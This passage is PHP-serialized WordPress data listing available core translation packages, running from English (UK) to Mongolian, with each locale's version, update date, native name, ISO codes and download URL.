(UK)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/en_GB.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"en_ZA\";a:8:{s:8:\"language\";s:5:\"en_ZA\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-07-29 13:22:09\";s:12:\"english_name\";s:22:\"English (South Africa)\";s:11:\"native_name\";s:22:\"English (South Africa)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/en_ZA.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:2:\"eo\";a:8:{s:8:\"language\";s:2:\"eo\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-08-19 08:40:47\";s:12:\"english_name\";s:9:\"Esperanto\";s:11:\"native_name\";s:9:\"Esperanto\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.8.2/eo.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"eo\";i:2;s:3:\"epo\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Daŭrigi\";}}s:5:\"es_CR\";a:8:{s:8:\"language\";s:5:\"es_CR\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-05-26 16:45:13\";s:12:\"english_name\";s:20:\"Spanish (Costa Rica)\";s:11:\"native_name\";s:22:\"Español de Costa Rica\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/es_CR.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_PE\";a:8:{s:8:\"language\";s:5:\"es_PE\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2024-10-16 21:04:12\";s:12:\"english_name\";s:14:\"Spanish (Peru)\";s:11:\"native_name\";s:17:\"Español de Perú\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/es_PE.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_CL\";a:8:{s:8:\"language\";s:5:\"es_CL\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-08-28 22:23:40\";s:12:\"english_name\";s:15:\"Spanish (Chile)\";s:11:\"native_name\";s:17:\"Español de Chile\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/es_CL.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_ES\";a:8:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-09-22 14:54:35\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/es_ES.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_AR\";a:8:{s:8:\"language\";s:5:\"es_AR\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-07-14 15:46:25\";s:12:\"english_name\";s:19:\"Spanish (Argentina)\";s:11:\"native_name\";s:21:\"Español de Argentina\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/es_AR.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_MX\";a:8:{s:8:\"language\";s:5:\"es_MX\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-09-23 19:33:59\";s:12:\"english_name\";s:16:\"Spanish (Mexico)\";s:11:\"native_name\";s:19:\"Español de México\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/es_MX.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_VE\";a:8:{s:8:\"language\";s:5:\"es_VE\";s:7:\"version\";s:5:\"6.4.6\";s:7:\"updated\";s:19:\"2023-10-16 16:00:04\";s:12:\"english_name\";s:19:\"Spanish (Venezuela)\";s:11:\"native_name\";s:21:\"Español de Venezuela\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.4.6/es_VE.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_EC\";a:8:{s:8:\"language\";s:5:\"es_EC\";s:7:\"version\";s:5:\"6.2.7\";s:7:\"updated\";s:19:\"2023-04-21 13:32:10\";s:12:\"english_name\";s:17:\"Spanish (Ecuador)\";s:11:\"native_name\";s:19:\"Español de Ecuador\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.2.7/es_EC.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_DO\";a:8:{s:8:\"language\";s:5:\"es_DO\";s:7:\"version\";s:6:\"5.8.11\";s:7:\"updated\";s:19:\"2021-10-08 14:32:50\";s:12:\"english_name\";s:28:\"Spanish (Dominican Republic)\";s:11:\"native_name\";s:33:\"Español de República Dominicana\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/5.8.11/es_DO.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_UY\";a:8:{s:8:\"language\";s:5:\"es_UY\";s:7:\"version\";s:8:\"5.8-beta\";s:7:\"updated\";s:19:\"2021-03-31 18:33:26\";s:12:\"english_name\";s:17:\"Spanish (Uruguay)\";s:11:\"native_name\";s:19:\"Español de Uruguay\";s:7:\"package\";s:67:\"https://downloads.wordpress.org/translation/core/5.8-beta/es_UY.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_PR\";a:8:{s:8:\"language\";s:5:\"es_PR\";s:7:\"version\";s:6:\"5.4.17\";s:7:\"updated\";s:19:\"2020-04-29 15:36:59\";s:12:\"english_name\";s:21:\"Spanish (Puerto Rico)\";s:11:\"native_name\";s:23:\"Español de Puerto Rico\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/5.4.17/es_PR.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_CO\";a:8:{s:8:\"language\";s:5:\"es_CO\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-07-11 05:24:36\";s:12:\"english_name\";s:18:\"Spanish (Colombia)\";s:11:\"native_name\";s:20:\"Español de Colombia\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/es_CO.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_GT\";a:8:{s:8:\"language\";s:5:\"es_GT\";s:7:\"version\";s:6:\"5.2.22\";s:7:\"updated\";s:19:\"2019-03-02 06:35:01\";s:12:\"english_name\";s:19:\"Spanish (Guatemala)\";s:11:\"native_name\";s:21:\"Español de Guatemala\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/5.2.22/es_GT.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:2:\"et\";a:8:{s:8:\"language\";s:2:\"et\";s:7:\"version\";s:5:\"6.5.5\";s:7:\"updated\";s:19:\"2024-06-06 09:50:37\";s:12:\"english_name\";s:8:\"Estonian\";s:11:\"native_name\";s:5:\"Eesti\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.5.5/et.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"et\";i:2;s:3:\"est\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Jätka\";}}s:2:\"eu\";a:8:{s:8:\"language\";s:2:\"eu\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-07-05 12:26:55\";s:12:\"english_name\";s:6:\"Basque\";s:11:\"native_name\";s:7:\"Euskara\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.8.2/eu.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"eu\";i:2;s:3:\"eus\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Jarraitu\";}}s:5:\"fa_AF\";a:8:{s:8:\"language\";s:5:\"fa_AF\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-02-14 17:29:08\";s:12:\"english_name\";s:21:\"Persian (Afghanistan)\";s:11:\"native_name\";s:31:\"(فارسی (افغانستان\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/fa_AF.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fa\";i:2;s:3:\"fas\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"ادامه\";}}s:5:\"fa_IR\";a:8:{s:8:\"language\";s:5:\"fa_IR\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-08-03 12:49:52\";s:12:\"english_name\";s:7:\"Persian\";s:11:\"native_name\";s:10:\"فارسی\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/fa_IR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fa\";i:2;s:3:\"fas\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"ادامه\";}}s:2:\"fi\";a:8:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-05-12 09:41:09\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.8.2/fi.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fi\";i:2;s:3:\"fin\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:5:\"Jatka\";}}s:5:\"fr_CA\";a:8:{s:8:\"language\";s:5:\"fr_CA\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-08-22 13:39:42\";s:12:\"english_name\";s:15:\"French (Canada)\";s:11:\"native_name\";s:19:\"Français du Canada\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/fr_CA.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fr\";i:2;s:3:\"fra\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuer\";}}s:5:\"fr_FR\";a:8:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-08-29 15:04:36\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/fr_FR.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"fr\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuer\";}}s:5:\"fr_BE\";a:8:{s:8:\"language\";s:5:\"fr_BE\";s:7:\"version\";s:5:\"6.5.6\";s:7:\"updated\";s:19:\"2024-02-01 23:56:53\";s:12:\"english_name\";s:16:\"French (Belgium)\";s:11:\"native_name\";s:21:\"Français de Belgique\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.5.6/fr_BE.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fr\";i:2;s:3:\"fra\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuer\";}}s:3:\"fur\";a:8:{s:8:\"language\";s:3:\"fur\";s:7:\"version\";s:6:\"4.8.26\";s:7:\"updated\";s:19:\"2023-04-30 13:56:46\";s:12:\"english_name\";s:8:\"Friulian\";s:11:\"native_name\";s:8:\"Friulian\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/translation/core/4.8.26/fur.zip\";s:3:\"iso\";a:2:{i:2;s:3:\"fur\";i:3;s:3:\"fur\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:2:\"fy\";a:8:{s:8:\"language\";s:2:\"fy\";s:7:\"version\";s:5:\"6.2.7\";s:7:\"updated\";s:19:\"2022-12-25 12:53:23\";s:12:\"english_name\";s:7:\"Frisian\";s:11:\"native_name\";s:5:\"Frysk\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.2.7/fy.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fy\";i:2;s:3:\"fry\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Trochgean\";}}s:2:\"gd\";a:8:{s:8:\"language\";s:2:\"gd\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-08-23 17:41:37\";s:12:\"english_name\";s:15:\"Scottish Gaelic\";s:11:\"native_name\";s:9:\"Gàidhlig\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/gd.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"gd\";i:2;s:3:\"gla\";i:3;s:3:\"gla\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:15:\"Lean air adhart\";}}s:5:\"gl_ES\";a:8:{s:8:\"language\";s:5:\"gl_ES\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-07-16 11:10:04\";s:12:\"english_name\";s:8:\"Galician\";s:11:\"native_name\";s:6:\"Galego\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/gl_ES.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"gl\";i:2;s:3:\"glg\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:2:\"gu\";a:8:{s:8:\"language\";s:2:\"gu\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-08-29 04:27:18\";s:12:\"english_name\";s:8:\"Gujarati\";s:11:\"native_name\";s:21:\"ગુજરાતી\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.8.2/gu.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"gu\";i:2;s:3:\"guj\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:25:\"ચાલુ રાખો\";}}s:3:\"haz\";a:8:{s:8:\"language\";s:3:\"haz\";s:7:\"version\";s:6:\"4.4.34\";s:7:\"updated\";s:19:\"2015-12-05 00:59:09\";s:12:\"english_name\";s:8:\"Hazaragi\";s:11:\"native_name\";s:15:\"هزاره گی\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/translation/core/4.4.34/haz.zip\";s:3:\"iso\";a:1:{i:3;s:3:\"haz\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"ادامه\";}}s:5:\"he_IL\";a:8:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"6.2.7\";s:7:\"updated\";s:19:\"2024-05-04 18:39:24\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.2.7/he_IL.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"he\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"המשך\";}}s:5:\"hi_IN\";a:8:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:5:\"6.4.6\";s:7:\"updated\";s:19:\"2025-02-06 05:17:11\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.4.6/hi_IN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"hi\";i:2;s:3:\"hin\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:25:\"जारी रखें\";}}s:2:\"hr\";a:8:{s:8:\"language\";s:2:\"hr\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-08-31 12:41:06\";s:12:\"english_name\";s:8:\"Croatian\";s:11:\"native_name\";s:8:\"Hrvatski\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.8.2/hr.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"hr\";i:2;s:3:\"hrv\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:7:\"Nastavi\";}}s:3:\"hsb\";a:8:{s:8:\"language\";s:3:\"hsb\";s:7:\"version\";s:5:\"6.2.7\";s:7:\"updated\";s:19:\"2023-02-22 17:37:32\";s:12:\"english_name\";s:13:\"Upper Sorbian\";s:11:\"native_name\";s:17:\"Hornjoserbšćina\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.2.7/hsb.zip\";s:3:\"iso\";a:2:{i:2;s:3:\"hsb\";i:3;s:3:\"hsb\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:4:\"Dale\";}}s:5:\"hu_HU\";a:8:{s:8:\"language\";s:5:\"hu_HU\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-06-09 13:56:03\";s:12:\"english_name\";s:9:\"Hungarian\";s:11:\"native_name\";s:6:\"Magyar\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/hu_HU.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"hu\";i:2;s:3:\"hun\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"Folytatás\";}}s:2:\"hy\";a:8:{s:8:\"language\";s:2:\"hy\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-12-03 16:21:10\";s:12:\"english_name\";s:8:\"Armenian\";s:11:\"native_name\";s:14:\"Հայերեն\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/hy.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"hy\";i:2;s:3:\"hye\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:20:\"Շարունակել\";}}s:5:\"id_ID\";a:8:{s:8:\"language\";s:5:\"id_ID\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-08-16 04:17:52\";s:12:\"english_name\";s:10:\"Indonesian\";s:11:\"native_name\";s:16:\"Bahasa Indonesia\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/id_ID.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"id\";i:2;s:3:\"ind\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Lanjutkan\";}}s:5:\"is_IS\";a:8:{s:8:\"language\";s:5:\"is_IS\";s:7:\"version\";s:6:\"4.9.27\";s:7:\"updated\";s:19:\"2018-12-11 10:40:02\";s:12:\"english_name\";s:9:\"Icelandic\";s:11:\"native_name\";s:9:\"Íslenska\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/4.9.27/is_IS.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"is\";i:2;s:3:\"isl\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Áfram\";}}s:5:\"it_IT\";a:8:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-07-11 21:28:29\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/it_IT.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"it\";i:2;s:3:\"ita\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continua\";}}s:2:\"ja\";a:8:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-09-22 12:19:14\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.8.2/ja.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"ja\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"次へ\";}}s:5:\"jv_ID\";a:8:{s:8:\"language\";s:5:\"jv_ID\";s:7:\"version\";s:6:\"4.9.27\";s:7:\"updated\";s:19:\"2019-02-16 23:58:56\";s:12:\"english_name\";s:8:\"Javanese\";s:11:\"native_name\";s:9:\"Basa Jawa\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/4.9.27/jv_ID.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"jv\";i:2;s:3:\"jav\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Nerusaké\";}}s:5:\"ka_GE\";a:8:{s:8:\"language\";s:5:\"ka_GE\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-04-14 08:02:58\";s:12:\"english_name\";s:8:\"Georgian\";s:11:\"native_name\";s:21:\"ქართული\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/ka_GE.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ka\";i:2;s:3:\"kat\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:30:\"გაგრძელება\";}}s:3:\"kab\";a:8:{s:8:\"language\";s:3:\"kab\";s:7:\"version\";s:5:\"6.2.7\";s:7:\"updated\";s:19:\"2023-07-05 11:40:39\";s:12:\"english_name\";s:6:\"Kabyle\";s:11:\"native_name\";s:9:\"Taqbaylit\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.2.7/kab.zip\";s:3:\"iso\";a:2:{i:2;s:3:\"kab\";i:3;s:3:\"kab\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Kemmel\";}}s:2:\"kk\";a:8:{s:8:\"language\";s:2:\"kk\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2024-07-18 02:49:24\";s:12:\"english_name\";s:6:\"Kazakh\";s:11:\"native_name\";s:19:\"Қазақ тілі\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.8.2/kk.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"kk\";i:2;s:3:\"kaz\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:20:\"Жалғастыру\";}}s:2:\"km\";a:8:{s:8:\"language\";s:2:\"km\";s:7:\"version\";s:6:\"5.2.22\";s:7:\"updated\";s:19:\"2019-06-10 16:18:28\";s:12:\"english_name\";s:5:\"Khmer\";s:11:\"native_name\";s:27:\"ភាសាខ្មែរ\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/5.2.22/km.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"km\";i:2;s:3:\"khm\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"បន្ត\";}}s:2:\"kn\";a:8:{s:8:\"language\";s:2:\"kn\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-07-22 16:17:50\";s:12:\"english_name\";s:7:\"Kannada\";s:11:\"native_name\";s:15:\"ಕನ್ನಡ\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.8.2/kn.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"kn\";i:2;s:3:\"kan\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:30:\"ಮುಂದುವರಿಸು\";}}s:5:\"ko_KR\";a:8:{s:8:\"language\";s:5:\"ko_KR\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-09-15 15:01:44\";s:12:\"english_name\";s:6:\"Korean\";s:11:\"native_name\";s:9:\"한국어\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/ko_KR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ko\";i:2;s:3:\"kor\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"계속\";}}s:3:\"ckb\";a:8:{s:8:\"language\";s:3:\"ckb\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-09-22 23:30:14\";s:12:\"english_name\";s:16:\"Kurdish (Sorani)\";s:11:\"native_name\";s:13:\"كوردی‎\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.8.2/ckb.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ku\";i:3;s:3:\"ckb\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:30:\"به‌رده‌وام به‌\";}}s:3:\"kir\";a:8:{s:8:\"language\";s:3:\"kir\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-07-17 05:00:42\";s:12:\"english_name\";s:6:\"Kyrgyz\";s:11:\"native_name\";s:16:\"Кыргызча\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.8.2/kir.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"ky\";i:2;s:3:\"kir\";i:3;s:3:\"kir\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:14:\"Улантуу\";}}s:2:\"lo\";a:8:{s:8:\"language\";s:2:\"lo\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-11-12 09:59:23\";s:12:\"english_name\";s:3:\"Lao\";s:11:\"native_name\";s:21:\"ພາສາລາວ\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/lo.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"lo\";i:2;s:3:\"lao\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:18:\"ຕໍ່​ໄປ\";}}s:5:\"lt_LT\";a:8:{s:8:\"language\";s:5:\"lt_LT\";s:7:\"version\";s:5:\"6.5.6\";s:7:\"updated\";s:19:\"2024-06-13 13:11:03\";s:12:\"english_name\";s:10:\"Lithuanian\";s:11:\"native_name\";s:15:\"Lietuvių kalba\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.5.6/lt_LT.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"lt\";i:2;s:3:\"lit\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Tęsti\";}}s:2:\"lv\";a:8:{s:8:\"language\";s:2:\"lv\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-07-15 19:11:43\";s:12:\"english_name\";s:7:\"Latvian\";s:11:\"native_name\";s:16:\"Latviešu valoda\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.8.2/lv.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"lv\";i:2;s:3:\"lav\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Turpināt\";}}s:5:\"mk_MK\";a:8:{s:8:\"language\";s:5:\"mk_MK\";s:7:\"version\";s:6:\"6.0.10\";s:7:\"updated\";s:19:\"2022-10-01 09:23:52\";s:12:\"english_name\";s:10:\"Macedonian\";s:11:\"native_name\";s:31:\"Македонски јазик\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/6.0.10/mk_MK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"mk\";i:2;s:3:\"mkd\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:16:\"Продолжи\";}}s:5:\"ml_IN\";a:8:{s:8:\"language\";s:5:\"ml_IN\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-09-18 17:08:34\";s:12:\"english_name\";s:9:\"Malayalam\";s:11:\"native_name\";s:18:\"മലയാളം\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/ml_IN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ml\";i:2;s:3:\"mal\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:18:\"തുടരുക\";}}s:2:\"mn\";a:8:{s:8:\"language\";s:2:\"mn\";s:7:\"version\";s:5:\"6.5.6\";s:7:\"updated\";s:19:\"2024-06-20 